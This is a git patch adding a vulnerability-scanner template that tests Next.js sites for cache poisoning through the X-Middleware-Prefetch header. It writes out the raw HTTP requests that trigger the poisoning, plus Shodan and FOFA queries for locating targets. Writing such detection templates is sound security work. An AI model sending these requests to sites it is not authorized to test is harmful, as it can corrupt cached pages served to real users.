From 69ea991d595808ad62e7884c78c2370520727a60 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 Jul 2024 15:53:43 +0530 Subject: [PATCH] Next.js Cache Poisoning using X-Middleware-Prefetch --- .../nextjs/nextjs-middleware-cache.yaml | 52 +++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml diff --git a/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml new file mode 100644 index 0000000000..d1fb00608e --- /dev/null +++ b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml @@ -0,0 +1,52 @@ +id: nextjs-middleware-cache + +info: + name: Next.js Cache Poisoning using X-Middleware-Prefetch + author: DhiyaneshDk + severity: high + reference: + - https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole + metadata: + verified: true + vendor: vercel + product: next.js + framework: node.js + shodan-query: + - http.html:"/_next/static" + - cpe:"cpe:2.3:a:zeit:next.js" + fofa-query: body="/_next/static" + tags: nextjs,cache + +variables: + rand: "{{rand_text_numeric(5)}}" + +http: + - raw: + - | + GET /?cb={{rand}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + X-Middleware-Prefetch: 1 + Priority: u=1 + + - | + @timeout: 5s + GET /?cb={{rand}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + X-Middleware-Prefetch: 1 + Priority: u=1 + + - | + @timeout: 5s + GET /?cb={{rand}} HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - "status_code_2 == 200 && contains(all_headers_2, 'X-Middleware-Skip: 1')" + - "status_code_3 == 200 && contains(all_headers_3, 'X-Middleware-Skip: 1')" + condition: and